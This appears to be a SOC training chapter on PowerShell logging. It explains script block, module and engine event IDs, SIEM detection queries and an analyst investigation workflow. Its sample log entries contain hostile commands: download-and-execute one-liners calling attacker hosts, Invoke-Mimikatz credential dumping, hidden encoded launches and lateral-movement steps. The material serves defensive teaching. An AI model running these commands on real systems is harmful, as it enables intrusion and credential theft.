Home > SOC Analysis

PowerShell Logs

PowerShell is one of the most abused tools by attackers on Windows systems. It gives direct access to .NET, memory, system APIs, remote execution, and scripts — making it ideal for malware, fileless attacks, recon, lateral movement, credential theft, persistence, and payload execution.
Because of this, PowerShell logs are one of the highest-value telemetry sources in the SOC.

This chapter explains PowerShell logging full-scale, ultra-practical, attacker-focused, with real log samples, SIEM queries, and complete investigation workflows.

Why PowerShell Logging Is Critical

Attackers use PowerShell to:

  • Execute encoded payloads

  • Download malware without files

  • Run recon commands (AD enumeration)

  • Dump credentials

  • Install persistence

  • Load in-memory Cobalt Strike beacons

  • Run lateral movement commands

PowerShell logs reveal:

  • Full script contents

  • Encoded command usage

  • Module loading

  • Remote execution

  • Suspicious command chains

  • Credential harvesting scripts

Without PowerShell logging, most modern Windows attacks become invisible.

PowerShell Logging Sources (Complete Breakdown)

1. PowerShell Script Block Logging (Event ID 4104)

Captures full script content, even if obfuscated or encoded.

Example:

EventID=4104
ScriptBlockText: IEX(New-Object Net.WebClient).DownloadString("http://malicious-ip/payload")
CommandPath: powershell.exe
User: DESKTOP\mayur

This directly reveals attacker behavior.

2. PowerShell Event Logging (Event ID 400/403/600)

Logs engine start, command invocation, and pipeline execution.

Examples:

EventID 400 - Engine Start  
EventID 403 - ExecuteCommand  
EventID 600 - Provider Lifecycle Events

Useful for confirming PowerShell activity even if 4104 is disabled.

3. Module Logging (Event ID 4103)

Shows internal PowerShell operations:

  • Loaded modules

  • cmdlets executed

  • Arguments passed

Example:

EventID=4103
CommandInvocation: Get-ADUser -Filter *
Module: ActiveDirectory

Very useful for detecting recon.

4. Windows Security Log (4624/4688 + PowerShell)

Sysmon and Security logs complement PowerShell logs.

Example from Sysmon:

EventID=1
Parent: winword.exe
Process: powershell.exe
CommandLine: powershell -nop -w hidden -enc JAB...

This exposes macro → PowerShell → payload chain.

PowerShell Log Categories (With Real Examples)

Below is what each PowerShell log captures, WITH practical attack samples.

1. Script Block Logs (4104) — Most Valuable for SOC

Script block logs capture full or partial script contents.

Example: Encoded Malware Download

EventID 4104
ScriptBlockText:
IEX ((New-Object Net.WebClient).DownloadString('http://185.11.22.10/beacon.ps1'))

Example: Credential Harvesting

EventID 4104
ScriptBlockText:
Invoke-Mimikatz -DumpCreds

Example: Recon Command

Get-ADUser -Filter * -Properties *

These logs expose attacker intent clearly.

2. Engine Start (400) — Detecting Initial Execution

Example:

EventID 400
Message: PowerShell engine started
HostApplication: powershell.exe -nop -w hidden -enc JAB...

Useful to see who launched PowerShell and with what arguments.

3. Pipeline Execution (403) — Command-by-Command Tracking

Example:

EventID 403
Command: ConvertTo-SecureString

Pipeline logs reveal every step of a multi-part command.

4. Module Invocation (4103) — Internal Operations

Example:

EventID 4103
CommandInvocation: Get-ADGroupMember
ModuleName: ActiveDirectory

Used heavily for:

  • Internal recon

  • AD enumeration

  • Lateral movement

Detecting Attacker Behavior With PowerShell Logs

Below are the exact patterns SOC analysts detect using PowerShell logs.

1. Encoded Commands (Base64)

Attackers run:

powershell.exe -enc <Base64Payload>

4104 exposes the decoded script.

Log Indicator

ScriptBlockText contains "FromBase64String"

2. Download & Execute (Fileless Malware)

Attacker example:

IEX (New-Object Net.WebClient).DownloadString(...)

This appears in 4104 even if the script never touches disk.

3. Obfuscation Patterns

Look for:

  • -nop (no profile)

  • -w hidden

  • Mixed capitalization (PoWeRsHeLl)

  • String concatenation

  • Char arrays

Example:

$e='IEX';$a='New-Object Net.WebClient'

4104 reveals the reconstructed script.

4. AD Recon / Lateral Movement Prep

Common recon:

Get-ADUser
Get-ADComputer
Get-ADGroup
Get-ADDomain
Get-ADTrust

If script block shows these → attacker preparing lateral movement.

5. PowerShell Remoting (WinRM Attacks)

Logs:

EventID 4104
ScriptBlockText: Invoke-Command -ComputerName SERVER01

Used for:

  • Lateral movement

  • Remote payload execution

6. Credential Dumping

Logs:

EventID 4104
ScriptBlockText: Invoke-Mimikatz

EDR may catch it, but PowerShell logs catch it too.

SIEM Queries for PowerShell Attack Detection

Examples analysts use in Splunk, Elastic, Sentinel, etc.

Detect encoded commands

event.code:4104 AND ScriptBlockText:*enc*

Detect malicious download

ScriptBlockText:*DownloadString*

Detect AD recon

ScriptBlockText:(Get-ADUser OR Get-ADGroup OR Get-ADComputer)

Detect PowerShell launched by Office

process.parent:"winword.exe" AND process.name:"powershell.exe"

Detect privilege abuse

ScriptBlockText:*Invoke-Mimikatz*

Full Attack Timeline Example Using PowerShell Logs

Step 1: User opens malicious Word file

Sysmon:

winword.exe → powershell.exe

Step 2: PowerShell engine starts

Security/PowerShell:

Event 400
HostApplication: powershell.exe -enc ...

Step 3: Script block captured

Event 4104
IEX (New-Object Net.WebClient).DownloadString('http://185.33.21.10/payload')

Step 4: Payload executed

Further script blocks:

Invoke-Mimikatz
Get-ADUser
net use \\server01\c$

Step 5: Lateral movement begins

4624 Logon Type 3 events appear.

Step 6: SIEM Correlates

  • Execution

  • Download

  • Recon

  • Credential access

  • Lateral movement

SIEM issues Critical Alert.

Analyst Workflow When Investigating PowerShell Activity

  1. Identify parent process

  2. Check for encoded or obfuscated commands

  3. Examine 4104 content

  4. Validate if user normally uses PowerShell

  5. Correlate with Sysmon:

    • Process creation

    • Network connections

  6. Check for signs of recon

  7. Check for signs of persistence

  8. Build timeline

  9. Decide: False Positive or Malicious

  10. Escalate or isolate host

This is real SOC workflow.

Intel Dump

  • PowerShell logs come from Script Block Logging (4104), Engine events (400/403), and Module logs (4103).

  • 4104 is critical because it captures full script body, including obfuscated commands.

  • Logs reveal encoded payloads, malware downloads, recon, credential dumping, and lateral movement.

  • Sysmon and Security logs complement PowerShell logs.

  • SIEM detections include encoded commands, suspicious parent processes, recon commands, remote executions, and Mimikatz invocation.

  • PowerShell logs are essential for detecting fileless and memory-based attacks.

HOME LEARN COMMUNITY DASHBOARD